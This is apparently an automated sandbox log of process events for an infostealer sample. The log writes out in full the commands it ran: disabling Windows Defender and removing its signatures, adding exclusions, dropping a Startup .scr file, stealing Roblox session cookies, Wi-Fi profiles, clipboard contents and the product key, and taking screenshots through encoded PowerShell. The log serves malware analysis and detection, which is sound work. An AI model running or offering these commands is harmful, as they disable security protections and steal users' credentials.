              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Users\user\Desktop\mei.exe C:\Users\user\Desktop\mei.exeJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mei.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wgovk1sp\wgovk1sp.cmdline
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6964.tmp" "c:\Users\user\AppData\Local\Temp\wgovk1sp\CSC886C9BC3BEB4426790141765FCC41D4.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74682\rar.exe a -r -hp"netomahserkral" "C:\Users\user\AppData\Local\Temp\XiW2X.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\mei.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiayw